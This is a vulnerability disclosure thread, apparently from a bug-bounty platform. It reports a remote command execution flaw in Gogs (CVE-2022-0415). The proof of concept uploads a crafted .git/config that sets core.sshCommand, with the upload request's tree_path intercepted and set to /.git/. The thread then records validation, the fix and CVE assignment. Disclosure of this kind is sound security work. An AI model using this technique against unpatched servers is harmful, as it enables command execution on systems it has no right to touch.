Remote Command Execution in uploading repository file in gogs/gogs

Valid

Reported on

Mar 11th 2022


Description

When uploading a file to the repository in Gogs, the tree_path parameter is not been validated. The attacker can set tree_path=/.git/ to upload file into the .git directory.

Rewrite .git/config file and set core.sshCommand, which leads to remote command execution vulnerability.

Proof of Concept

Create a repository in Gogs, upload a file config to the repository on the web page:

[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    ignorecase = true
    precomposeunicode = true
    sshCommand = echo pwnned > /tmp/poc
[remote "origin"]
    url = git@github.com:torvalds/linux.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
    remote = origin
    merge = refs/heads/master

Intercept the HTTP POST form submitting request, and set parameter to tree_path=/.git/ in request body.

Then a file with text pwnned is created in /tmp/poc.

Impact

This vulnerability is capable of executing commands on the remote server and gain the privileged user account, which leads sensitive data exposure, identity theft, etc.

We are processing your report and will contact the gogs team within 24 hours. 2 months ago
Joe Chen validated this vulnerability 2 months ago
E99p1ant has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the gogs team. We will try again in 7 days. 2 months ago
Joe Chen confirmed that a fix has been merged on 0fef3c 2 months ago
The fix bounty has been dropped
repo_editor.go#L490-L495 has been validated
E99p1ant
2 months ago

Maintainer


@admin Hi, can you assign a CVE ID for this report? Thanks.

Jamie Slome
2 months ago

Admin


Hi @wuhan005 - before we assign and publish a CVE here, we require the permission of the maintainer.

@maintainer - are you happy for a CVE to be assigned and published for this report?

Joe Chen
2 months ago

Maintainer


Yes, it would be great for having a CVE to be assigned and published for this report!

Jamie Slome
2 months ago

Admin


CVE-2022-0415 assigned and published! 🎊

E99p1ant
2 months ago

Maintainer


Thanks a lot!

to join this conversation